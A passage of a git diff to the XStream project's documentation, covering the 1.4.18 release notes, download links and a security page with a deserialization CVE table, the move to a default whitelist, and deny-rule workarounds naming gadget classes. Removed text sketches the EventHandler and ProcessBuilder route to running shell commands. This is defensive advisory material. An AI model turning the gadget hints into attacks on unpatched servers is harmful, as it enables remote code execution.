vulnerability <a href="CVE-2013-7285.html"> - CVE-2013-7285</a>, an arbitrary execution of commands when unmarshalling for XStream instances with + CVE-2013-7285</a>, an arbitrary execution of commands when unmarshalling with XStream instances using an uninitialized security framework. Only 1.4.10 uninitialized security framework was affected.</p> <h2>Minor changes</h2> diff --git a/xstream-distribution/src/content/download.html b/xstream-distribution/src/content/download.html index 577184384171f06edc11a7b05fea53093b7a9788..949f57d2097447cf9a5e05a366dcfb32c6a3b05f 100644 --- a/xstream-distribution/src/content/download.html +++ b/xstream-distribution/src/content/download.html 
@@ -1,7 +1,7 @@
 <html>
 <!--
 Copyright (C) 2005, 2006 Joe Walnes.
- Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2015, 2016, 2017, 2018, 2020 XStream committers.
+ Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2015, 2016, 2017, 2018, 2020, 2021 XStream committers.
 All rights reserved.
 
 The software in this package is published under the terms of the BSD
@@ -18,18 +18,18 @@ <p><a href="versioning.html">About XStream version numbers...</a></p> - <h1 id="stable">Stable Version: <span class="version">1.4.15</span></h1> + <h1 id="stable">Stable Version: <span class="version">1.4.18</span></h1> <ul> - <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-bin.zip">Binary distribution:</a></b> + <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.18/xstream-distribution-1.4.18-bin.zip">Binary distribution:</a></b> Contains the XStream jar files, the Hibernate and Benchmark modules and all the dependencies.</li> - <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.15/xstream-distribution-1.4.15-src.zip">Source distribution:</a></b> + <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-distribution/1.4.18/xstream-distribution-1.4.18-src.zip">Source distribution:</a></b> Contains the complete XStream project as if checked out from the Subversion version tag.</li> - <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.15/xstream-1.4.15.jar">XStream Core only:</a> + <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream/1.4.18/xstream-1.4.18.jar">XStream Core only:</a> The xstream.jar only as it is downloaded automatically when it is referenced as Maven dependency.</b></li> - <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.15/xstream-hibernate-1.4.15.jar">XStream Hibernate module:</a></b> + <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-hibernate/1.4.18/xstream-hibernate-1.4.18.jar">XStream Hibernate module:</a></b> The xstream-hibernate.jar as it is downloaded automatically when it is referenced as Maven dependency.</li> - <li><b><a 
href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.15/xstream-jmh-1.4.15-app.zip">XStream JMH module:</a></b> + <li><b><a href="https://repo1.maven.org/maven2/com/thoughtworks/xstream/xstream-jmh/1.4.18/xstream-jmh-1.4.18-app.zip">XStream JMH module:</a></b> The xstream-jmh-app.zip as standalone application with start scripts and all required libraries.</li> </ul> @@ -41,7 +41,7 @@ <div class="Source XML"><pre><dependency> <groupId>com.thoughtworks.xstream</groupId> <artifactId>xstream</artifactId> - <version>1.4.15</version> + <version>1.4.18</version> </dependency></pre></div> <h1 id="previous-releases">Previous Releases</h1> 
@@ -55,17 +55,21 @@ <h1 id="optional-deps">Optional Dependencies</h1> - <p>Note, that all those dependencies can be optional. XStream uses by default the XPP API in combination with the - Xpp3 implementation. Therefore are these dependencies not declared as optional in Maven. However, depending on your - choice of the XML parser, you can exclude the dependencies for the XPP API (e.g. by selecting Xpp3 directly) or - Xpp3 (e.g. by selecting StAX). You will then have to declare the dependencies for the alternative XML parser - yourself unless you use a parser form the Java runtime.</p> + <p>All these dependencies can be optional. XStream uses by default the XPP API in combination with the MXParser + implementation. Therefore are these dependencies not declared as optional in Maven. However, depending on your + choice of the XML parser, you can exclude the dependencies for the MXParser (e.g. by selecting StAX). You will + then have to declare the dependencies for the alternative XML parser yourself unless you use a parser form the Java + runtime.</p> + + <p>Note, that the bundle entries of the manifest do not declare any dependencies. 
In an OSGi environment it is the + task of the developer to setup the used bundles for his own project.</p> <ul> <li>Supported XML parsers and packages: <ul> + <li><a href="https://repo1.maven.org/maven2/io/github/x-stream/mxparser/1.2.2/mxparser-1.2.2.jar">MXParser</a>, an XML pull parser and fork of Xpp3 (recommended).</li> <li><a href="https://repo1.maven.org/maven2/xmlpull/xmlpull/1.1.3.1/xmlpull-1.1.3.1.jar">XmlPull</a>, the <a href="http://www.xmlpull.org/">XML pull parser API</a> and factory to detect available implementations.</li> - <li><a href="http://www.extreme.indiana.edu/dist/java-repository/xpp3/jars/xpp3_min-1.1.4c.jar">Xpp3</a>, an XML pull parser (recommended).</li> + <li><a href="http://www.extreme.indiana.edu/dist/java-repository/xpp3/jars/xpp3_min-1.1.4c.jar">Xpp3</a>, an XML pull parser.</li> <li><a href="http://downloads.sourceforge.net/kxml/kxml2-2.3.0.jar">kXML2</a> or <a href="http://downloads.sourceforge.net/kxml/kxml2-min-2.3.0.jar">kXML2-min</a>, an XML pull parser.</li> <li><a href="http://downloads.sourceforge.net/dom4j/dom4j-1.6.1.zip">DOM4J</a>, easy XML representation and manipulation framework.</li> <li><a href="http://www.jdom.org/dist/binary/archive/jdom-1.1.3.zip">JDOM</a>, easy XML representation and manipulation (superseded by JDOM2).</li> 
@@ -109,8 +113,8 @@ <ul> <li>JMH dependencies: <ul> - <li><a href="https://repo1.maven.org/maven2/org/openjdk/jmh/jmh-core/1.19/jmh-core-1.19.jar">JMH Core 1.19</a>, for Java 6 or higher.</li> - <li><a href="https://repo1.maven.org/maven2/org/openjdk/jmh/jmh-generator-annprocess/1.19/jmh-generator-annprocess-1.19.jar">JMH Generator Annotation Processor 1.19</a>, for Java 6 or higher.</li> + <li><a href="https://repo1.maven.org/maven2/org/openjdk/jmh/jmh-core/1.21/jmh-core-1.21.jar">JMH Core 1.21</a>, for Java 6 or higher.</li> + <li><a href="https://repo1.maven.org/maven2/org/openjdk/jmh/jmh-generator-annprocess/1.21/jmh-generator-annprocess-1.21.jar">JMH Generator Annotation Processor 1.21</a>, for Java 6 or higher.</li> </ul> </li> </ul> diff --git a/xstream-distribution/src/content/index.html b/xstream-distribution/src/content/index.html index 38a0d1f5add1941986b1e7cc125830661229bcce..7ae8d130b5170c5ac9c4b550fdefba457fb18588 100644 --- a/xstream-distribution/src/content/index.html +++ b/xstream-distribution/src/content/index.html @@ -1,7 +1,7 @@ <html> <!-- Copyright (C) 2005, 2006 Joe Walnes. - Copyright (C) 2006, 2007, 2008, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020 XStream committers. + Copyright (C) 2006, 2007, 2008, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020, 2021 XStream committers. All rights reserved. The software in this package is published under the terms of the BSD 
@@ -73,11 +73,24 @@ <h1 id="news">Latest News</h1> - <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2> + <h2 id="release"><b>August 22, 2021</b> XStream 1.4.18 released</h2> <p class="highlight">This maintenance release addresses the security vulnerabilities - <a href="CVE-2020-26258.html">CVE-2020-26258</a> and <a href="CVE-2020-26259.html">CVE-2020-26259</a>, when - unmarshalling for XStream instances with uninitialized security framework.</p> + <a href="CVE-2021-39139.html">CVE-2021-39139</a>, + <a href="CVE-2021-39140.html">CVE-2021-39140</a>, + <a href="CVE-2021-39141.html">CVE-2021-39141</a>, + <a href="CVE-2021-39144.html">CVE-2021-39144</a>, + <a href="CVE-2021-39145.html">CVE-2021-39145</a>, + <a href="CVE-2021-39146.html">CVE-2021-39146</a>, + <a href="CVE-2021-39147.html">CVE-2021-39147</a>, + <a href="CVE-2021-39148.html">CVE-2021-39148</a>, + <a href="CVE-2021-39149.html">CVE-2021-39149</a>, + <a href="CVE-2021-39150.html">CVE-2021-39150</a>, + <a href="CVE-2021-39151.html">CVE-2021-39151</a>, + <a href="CVE-2021-39152.html">CVE-2021-39152</a>, + <a href="CVE-2021-39153.html">CVE-2021-39153</a>, and + <a href="CVE-2021-39154.html">CVE-2021-39154</a>, when unmarshalling with an XStream instance using the default + blacklist of an uninitialized security framework. XStream is therefore now using a whitelist by default.</p> <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> diff --git a/xstream-distribution/src/content/news.html b/xstream-distribution/src/content/news.html index 1e7962607eb0e864e17d9642747b4935a24ee10b..d9c8007d8448df78bfb251152fae6e39e8e740d8 100644 --- a/xstream-distribution/src/content/news.html +++ b/xstream-distribution/src/content/news.html 
@@ -1,7 +1,7 @@ <html> <!-- Copyright (C) 2005, 2006 Joe Walnes. - Copyright (C) 2006, 2007, 2008, 2009, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020 XStream committers. + Copyright (C) 2006, 2007, 2008, 2009, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2020, 2021 XStream committers. All rights reserved. The software in this package is published under the terms of the BSD 
@@ -16,6 +16,60 @@ <body> + <h2 id="1.4.18"><b>August 22, 2021</b> XStream 1.4.18 released</h2> + + <p class="highlight">This maintenance release addresses the security vulnerabilities + <a href="CVE-2021-39139.html">CVE-2021-39139</a>, + <a href="CVE-2021-39140.html">CVE-2021-39140</a>, + <a href="CVE-2021-39141.html">CVE-2021-39141</a>, + <a href="CVE-2021-39144.html">CVE-2021-39144</a>, + <a href="CVE-2021-39145.html">CVE-2021-39145</a>, + <a href="CVE-2021-39146.html">CVE-2021-39146</a>, + <a href="CVE-2021-39147.html">CVE-2021-39147</a>, + <a href="CVE-2021-39148.html">CVE-2021-39148</a>, + <a href="CVE-2021-39149.html">CVE-2021-39149</a>, + <a href="CVE-2021-39150.html">CVE-2021-39150</a>, + <a href="CVE-2021-39151.html">CVE-2021-39151</a>, + <a href="CVE-2021-39152.html">CVE-2021-39152</a>, + <a href="CVE-2021-39153.html">CVE-2021-39153</a>, and + <a href="CVE-2021-39154.html">CVE-2021-39154</a>, when unmarshalling with an XStream instance using the default + blacklist of an uninitialized security framework. 
XStream is therefore now using a whitelist by default.</p> + + <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> + + <p>Note, the next major release 1.5 will require Java 8.</p> + + <h2 id="1.4.17"><b>May 13, 2021</b> XStream 1.4.17 released</h2> + + <p class="highlight">This maintenance release addresses the security vulnerability + <a href="CVE-2021-29505.html">CVE-2021-29505</a>, when unmarshalling with XStream instances using an uninitialized + security framework.</p> + + <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> + + <p>Note, the next major release 1.5 will require Java 8.</p> + + <h2 id="1.4.16"><b>March 13, 2021</b> XStream 1.4.16 released</h2> + + <p class="highlight">This maintenance release switches XStream's default parser and addresses following security + vulnerabilities, when unmarshalling with an XStream instances using an uninitialized security framework: + <a href="CVE-2021-21341.html">CVE-2021-21341</a>, + <a href="CVE-2021-21342.html">CVE-2021-21342</a>, + <a href="CVE-2021-21343.html">CVE-2021-21343</a>, + <a href="CVE-2021-21344.html">CVE-2021-21344</a>, + <a href="CVE-2021-21345.html">CVE-2021-21345</a>, + <a href="CVE-2021-21346.html">CVE-2021-21346</a>, + <a href="CVE-2021-21347.html">CVE-2021-21347</a>, + <a href="CVE-2021-21348.html">CVE-2021-21348</a>, + <a href="CVE-2021-21349.html">CVE-2021-21349</a>, + <a href="CVE-2021-21350.html">CVE-2021-21350</a>, and + <a href="CVE-2021-21351.html">CVE-2021-21351</a>. + </p> + + <p>View the complete <a href="changes.html">change log</a> and <a href="download.html">download</a>.</p> + + <p>Note, the next major release 1.5 will require Java 8.</p> + <h2 id="1.4.15"><b>December 13, 2020</b> XStream 1.4.15 released</h2> <p class="highlight">This maintenance release addresses the security vulnerabilities 
diff --git a/xstream-distribution/src/content/security.html b/xstream-distribution/src/content/security.html index 036cbd747a8aeb881c8d4443a3749dd29d740535..78f70d9dcef26ca4892b1c40a3715028f139995d 100644 --- a/xstream-distribution/src/content/security.html +++ b/xstream-distribution/src/content/security.html @@ -1,6 +1,6 @@ <html> <!-- - Copyright (C) 2014, 2015, 2017, 2019, 2020 XStream committers. + Copyright (C) 2014, 2015, 2017, 2019, 2020, 2021 XStream committers. All rights reserved. The software in this package is published under the terms of the BSD @@ -18,9 +18,6 @@ XML, and XML to Java objects. As a result, it is possible to create an instance of XStream with the default constructor, call a method to convert an object into XML, then call another method to turn the XML back into an equivalent Java object. By design, there are few limits to the type of objects XStream can handle.</p> - - <p class=highlight>Note: XStream supports other data formats than XML, e.g. JSON. Those formats can be used for - the same attacks.</p> <p>This flexibility comes at a price. XStream applies various techniques under the hood to ensure it is able to handle all types of objects. This includes using undocumented Java features and reflection. The XML generated by 
@@ -30,16 +27,202 @@ <p>The provided XML data is used by XStream to unmarshal Java objects. This data can be manipulated by injecting the XML representation of other objects, that were not present at marshalling time. An attacker could take advantage of this to access private data, delete local files, execute arbitrary code or shell commands in the - context of the server running the XStream process. Concrete cases are described in - <a href="CVE-2013-7285.html">CVE-2013-7285</a>, <a href="CVE-2020-26217.html">CVE-2020-26217</a>, - <a href="CVE-2020-26258.html">CVE-2020-26258</a>, and <a href="CVE-2020-26259.html">CVE-2020-26259</a>.</p> + context of the server running the XStream process or cause a denial of service by crashing the application or + manage to enter an endless loop consuming 100% of CPU cycles.</p> + + <p class=highlight>Note: XStream supports other data formats than XML, e.g. JSON. Those formats can be used for + the same attacks.</p> <p>Note, that the XML data can be manipulated on different levels. For example, manipulating values on existing objects (such as a price value), accessing private data, or breaking the format and causing the XML parser to fail. The latter case will raise an exception, but the former case must be handled by validity checks in any application - which processes user-supplied XML. A worst case scenario is the injection of arbitrary code or shell commands, as noted above. - Even worse, <a href="CVE-2017-7957.html">CVE-2017-7957</a> describes a case to crash the Java Virtual Machine - causing a Denial of Service.</p> + which processes user-supplied XML.</p> + + <h2 id="CVEs">Documented Vulnerabilities</h2> + + <p>Over the years, several of these attacks have been reported and documented in the Common Vulnerability and + Exposure (CVE) system managed by the <a href="http://www.mitre.org/">Mitre Corporation</a>. 
Following a list of the + reported vulnerabilities for the different versions:</p> + + <table summary="Table of reported vulnerabilities documented as CVE"> + <tr> + <th>CVE</th> + <th>Description</th> + </tr> + <tr> + <th>Version 1.4.17</th> + <td></td> + </tr> + <tr> + <th><a href="CVE-2021-39139.html">CVE-2021-39139</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-39140.html">CVE-2021-39140</a></th> + <td>XStream can cause a Denial of Service.</td> + </tr> + <tr> + <th><a href="CVE-2021-39141.html">CVE-2021-39141</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-39144.html">CVE-2021-39144</a></th> + <td>XStream is vulnerable to a Remote Command Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-39145.html">CVE-2021-39145</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-39146.html">CVE-2021-39146</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-39147.html">CVE-2021-39147</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-39148.html">CVE-2021-39148</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-39149.html">CVE-2021-39149</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-39150.html">CVE-2021-39150</a></th> + <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an + arbitrary URL referencing a resource in an intranet or the local host.</td> + </tr> + <tr> + <th><a href="CVE-2021-39151.html">CVE-2021-39151</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a 
href="CVE-2021-39152.html">CVE-2021-39152</a></th> + <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an + arbitrary URL referencing a resource in an intranet or the local host.</td> + </tr> + <tr> + <th><a href="CVE-2021-39153.html">CVE-2021-39153</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-39154.html">CVE-2021-39154</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th>Version 1.4.16</th> + <td></td> + </tr> + <tr> + <th><a href="CVE-2021-29505.html">CVE-2021-29505</a></th> + <td>XStream is vulnerable to a Remote Command Execution attack.</td> + </tr> + <tr> + <th>Version 1.4.15</th> + <td></td> + </tr> + <tr> + <th><a href="CVE-2021-21341.html">CVE-2021-21341</a></th> + <td>XStream can cause a Denial of Service.</td> + </tr> + <tr> + <th><a href="CVE-2021-21342.html">CVE-2021-21342</a></th> + <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an + arbitrary URL referencing a resource in an intranet or the local host.</td> + </tr> + <tr> + <th><a href="CVE-2021-21343.html">CVE-2021-21343</a></th> + <td>XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the + executing process has sufficient rights.</td> + </tr> + <tr> + <th><a href="CVE-2021-21344.html">CVE-2021-21344</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-21345.html">CVE-2021-21345</a></th> + <td>XStream is vulnerable to a Remote Command Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-21346.html">CVE-2021-21346</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-21347.html">CVE-2021-21347</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + 
</tr> + <tr> + <th><a href="CVE-2021-21348.html">CVE-2021-21348</a></th> + <td>XStream is vulnerable to an attack using Regular Expression for a Denial of Service (ReDos).</td> + </tr> + <tr> + <th><a href="CVE-2021-21349.html">CVE-2021-21349</a></th> + <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an + arbitrary URL referencing a resource in an intranet or the local host.</td> + </tr> + <tr> + <th><a href="CVE-2021-21350.html">CVE-2021-21350</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th><a href="CVE-2021-21351.html">CVE-2021-21351</a></th> + <td>XStream is vulnerable to an Arbitrary Code Execution attack.</td> + </tr> + <tr> + <th>Version 1.4.14</th> + <td></td> + </tr> + <tr> + <th><a href="CVE-2020-26258.html">CVE-2020-26258</a></th> + <td>A Server-Side Forgery Request can be activated unmarshalling with XStream to access data streams from an + arbitrary URL referencing a resource in an intranet or the local host.</td> + </tr> + <tr> + <th><a href="CVE-2020-26259.html">CVE-2020-26259</a></th> + <td>XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the + executing process has sufficient rights.</td> + </tr> + <tr> + <th>Version 1.4.13</th> + <td></td> + </tr> + <tr> + <th><a href="CVE-2020-26217.html">CVE-2020-26217</a></th> + <td>XStream can be used for Remote Code Execution.</td> + </tr> + <tr> + <th>Version 1.4.9</th> + <td></td> + </tr> + <tr> + <th><a href="CVE-2017-7957.html">CVE-2017-7957</a></th> + <td>XStream can cause a Denial of Service when unmarshalling void.</td> + </tr> + <tr> + <th>Version 1.4.8</th> + <td></td> + </tr> + <tr> + <th><a href="CVE-2016-3674.html">CVE-2016-3674</a></th> + <td>XML External Entity (XXE) Vulnerability in XStream.</td> + </tr> + <tr> + <th>Version 1.4.6 (and 1.4.10)</th> + <td></td> + </tr> + <tr> + <th><a href="CVE-2013-7285.html">CVE-2013-7285</a></th> + 
<td>XStream can be used for Remote Code Execution.</td> + </tr> + </table> + + <p>See <a href="#workaround">workarounds</a> for the different versions covering all the CVEs listed here.</p> + + <p class="hightlight">This list contains only vulnerabilities, that could be created using the Java runtime with + XStream. Vulnerabilities introduced by using additional 3rd party libraries and classes are beyond XStream's + responsibility.</p> <h2 id="external">External Security</h2> 
@@ -54,36 +237,26 @@ <h2 id="implicit">Implicit Security</h2> <p>As explained above, it is possible to inject other object instances if an attacker is able to define the data - used to deserialize the Java objects. E.g. a known exploit can be created with the help of the Java runtime - library using the Java Bean <a href="http://docs.oracle.com/javase/7/docs/api/java/beans/EventHandler.html">EventHandler</a> - as described in <a href="CVE-2013-7285.html">CVE-2013-7285</a>. This scenario can be used perfectly to - replace/inject a dynamic proxy with such an EventHandler at any location in the XML where its parent expects an - object of such an interface's type or a simple object instance (any list element will suffice). The usage of a - ProcessBuilder as an embedded element, coupled with the redirection of any call to the ProcessBuilder's - <a href="http://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html#start()">start()</a> method allows - an attacker to call shell commands. Knowing how to define such an attack is the only prerequisite.</p> + used to deserialize the Java objects, see the different CVEs. Knowing how to define such an attack is the only + prerequisite.</p>         - <p>More scenarios have been identified for types that are already delivered with the Java runtime. Looking at - well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, the possibility for more - exploits is very high. A class like InvokerTransformer of Apache Commons Collections has a high potential for - attacks.</p> + <p>All those scenarios were based on types that are delivered with the Java runtime at some version. Looking at + other well-known and commonly used Java libraries libraries such as ASM, CGLIB, or Groovy, you will have to assume + other scenarios for exploits as well. A class like InvokerTransformer of Apache Commons Collections has a high + potential for attacks. By default XStream 1.4.18 works now with a whitelist. 
If you modify the default setup, it + is also your responsibility to protect your clients from such vulnerabilities.</p> +         + <p>Note: This vulnerability is not even a special problem of XStream. XML being deserialized by XStream acts here + like a script, and the scenario above can be created with any script that is executed within a Java runtime (e.g. + using its JavaScript interpreter) if someone is able to manipulate it externally. The key message for application + developers is that deserializing arbitrary user-supplied content is a dangerous proposition in all cases. The best + approach to prevent such an attach is a <a href="#example">whitelist</a>, i.e. the deserialization mechanism should + only allow explicit types. See also the advice for vulnerabilities using + <a href="https://docs.oracle.com/javase/10/core/serialization-filtering1.htm">Java Serialization</a>.</p> <p class="hightlight">A blacklist for special classes only creates therefore a scenario for a false security, - because no-one can assure, that no other scenario arise. A better approach is the usage of a whitelist i.e. the - allowed class types are setup explicitly. This will be the default for XStream 1.5.x (see below).</p> - - <p>Starting with XStream 1.4.7, an instance of the EventHandler is no longer handled by default. You have to - explicitly register a ReflectionConverter for the EventHandler type, if your application has the requirement to - persist such an object. Starting with XStream 1.4.10 the list of revoked types is enhanced by all types of the - java.crypto package and any inner class named LazyIterator. On top you still have to take special care regarding - the location of the persisted data, and how your application can ensure its integrity.</p> -         - <p class=highlight>Note: This vulnerability is not even a special problem of XStream. 
XML being deserialized by - XStream acts here like a script, and the scenario above can be created with any script that is executed within a - Java runtime (e.g. using its JavaScript interpreter) if someone is able to manipulate it externally. The key - message for application developers is that deserializing arbitrary user-supplied content is a dangerous proposition - in all cases. The best approach to prevent such an attach is a <a href="#example">whitelist</a>, i.e. the - deserialization mechanism should only allow explicit types.</p> + because no-one can assure, that no other vulnerability is found. A better approach is the usage of a whitelist + i.e. the allowed class types are setup explicitly. This is the default for XStream 1.4.18 (see below).</p> <h2 id="explicit">Explicit Security</h2>     
@@ -93,17 +266,18 @@ framework supports the setup of a blacklist or whitelist scenario. Any application should use this feature to limit the danger of arbitrary command execution if it deserializes data from an external source.</p> - <p>XStream itself sets up a blacklist by default, i.e. it blocks all currently known critical classes of the Java - runtime. Main reason for the blacklist is compatibility, because otherwise newer versions of XStream 1.4.x can no - longer be used as drop-in replacement. Unfortunately this provides a false sense of security. Every XStream - client should therefore switch to a whitelist on its own as soon as possible. XStream itself will use a whitelist - as default starting with 1.5.x and only clients that have also changed their setup will be able to use this newer - version again as drop-in replacement. You can use - <a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a> - to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p> + <p>XStream itself sets up a whitelist by default, i.e. it blocks all classes except those types it has explicit + converters for. Until version 1.4.17 it used a blacklist by default, i.e. it tried to block all currently known + critical classes of the Java runtime. Main reason for the blacklist were compatibility, it allowed to use newer + versions of XStream as drop-in replacement. However, this approach has failed. A growing list of security reports + has proven, that a blacklist is inherently unsafe, apart from the fact that types of 3rd libraries were not even + considered. XStream provides the ability to setup a whitelist since version 1.4.7, a version released nine years + before 1.4.18. Clients who have adapted their setup and initialize the security framework are able to use newer + versions again as drop-in replacement. 
A blacklist scenario should be avoided in general, because it provides a + false sense of security.</p>         - <p class=highlight>Note: If a type on a whitelist contains itself other members that are handled by XStream, you - will have to add those member's types to the whitelist also.</p> + <p class=highlight>Note: If a type on a whitelist contains itself other members that are handled by XStream, you + will have to add those member's types to the whitelist also. There is no automatism for indirect references.</p>         <p>Separate to the XStream security framework, it has always been possible to overwrite the setupConverter method of XStream to register only the required converters.</p> @@ -115,7 +289,7 @@ <p>XML itself supports input validation using a schema and a validating parser. With XStream, you can use e.g. a DOM parser for validation, but it will take some effort to ensure that the XML read and written by XStream matches - the schema in first place, because XStream uses additionally own attributes. Typically you will have to write some + the schema in first place, because XStream uses additionally own attributes. Typically you will have to write some custom converters, but it can be worth the effort depending on the use case.</p> <h1 id="framework">Security Framework</h1> 
@@ -125,12 +299,12 @@ EventHandler. To prevent such a possibility at all, XStream version 1.4.7 and above contains a security framework, allowing application developers to define which types are allowed to be unmarshalled with XStream. Use <a href="javadoc/com/thoughtworks/xstream/XStream.html#setupDefaultSecurity-com.thoughtworks.xstream.XStream-">XStream.setupDefaultSecurity()</a> - to install the default whitelist of 1.5.x already with 1.4.10 or higher.</p></p> + to install the default whitelist of 1.4.18 already with 1.4.7 to 1.4.10.</p>         <p>The core interface is <a href="javadoc/com/thoughtworks/xstream/security/TypePermission.html">TypePermission</a>. The <a href="javadoc/com/thoughtworks/xstream/mapper/SecurityMapper.html">SecurityMapper</a> will evaluate a list of registered instances for every type that will be required while unmarshalling input data. The interface has one - simple method:</p><div class="Source Java"><pre>boolean allow(Class<?>);</pre></div> + simple method:</p><div class="Source Java"><pre>boolean allow(Class);</pre></div>         <p>The <a href="javadoc/com/thoughtworks/xstream/XStream.html">XStream</a> facade provides the following methods to register such type permissions within the SecurityMapper:</p><div class="Source Java"> @@ -248,7 +422,7 @@ XStream.denyTypeHierary(Class);</pre></div> <h2 id="example">Example Code Whitelist</h2> - <p>XStream uses the AnyTypePermission by default, i.e. any type is accepted. You have to clear out this default + <p>XStream uses the AnyTypePermission by default, i.e. any type is accepted. You have to clear out this default and register your own permissions to activate the security framework (the Blog type is from the <a href="alias-tutorial.html">Alias Tutorial</a>):</p> <div class="Source Java"><pre>XStream xstream = new XStream(); 
@@ -264,6 +438,71 @@ xstream.allowTypesByWildcard(new String[] { }); </pre></div> - <p>You may have a further look at XStream's acceptance tests, the security framework is enabled there in general.</p> + <p>You may have a further look at XStream's acceptance tests, the security framework is enabled there in general.</p> +         + <h2 id="workaround">Workarounds for older XStream versions</h2> + + <p>As recommended, use XStream's security framework to implement a whitelist for the allowed types. This is + possible since XStream 1.4.7 and it is the default since XStream 1.4.18.</p> + + <p>Users of XStream 1.4.17 who insist to use XStream default blacklist - despite that clear recommendation - can + add these lines to XStream's setup code:</p> +<div class="Source Java"><pre>xstream.denyTypesByWildcard(new String[]{ "sun.reflect.**", "sun.tracing.**", "com.sun.corba.**" }); +xstream.denyTypesByRegExp(new String[]{ ".*\\.ws\\.client\\.sei\\..*", ".*\\$ProxyLazyValue", "com\\.sun\\.jndi\\..*Enumerat(?:ion|tor),.*\\$URLData" }); +</pre></div> + + <p>Users of XStream 1.4.16 should add these lines and <strong>additionally</strong> the lines for version 1.4.17:</p> +<div class="Source Java"><pre>xstream.denyTypesByRegExp(new String[]{ ".*\\.Lazy(?:Search)?Enumeration.*", "(?:java|sun)\\.rmi\\..*" }); +</pre></div> + + <p>Users of XStream 1.4.15 should add these lines and <strong>additionally</strong> the lines for version 1.4.16 and 1.4.17:</p> +<div class="Source Java"><pre>xstream.denyTypes(new String[]{ "sun.awt.datatransfer.DataTransferer$IndexOrderComparator", "com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator" }); +xstream.denyTypesByRegExp(new String[]{ ".*\\$ServiceNameIterator", "(javax|sun.swing)\\..*LazyValue", "javafx\\.collections\\.ObservableList\\$.*", ".*\\.bcel\\..*\\.util\\.ClassLoader" }); +xstream.denyTypeHierarchy(java.io.InputStream.class ); +xstream.denyTypeHierarchy(java.nio.channels.Channel.class ); 
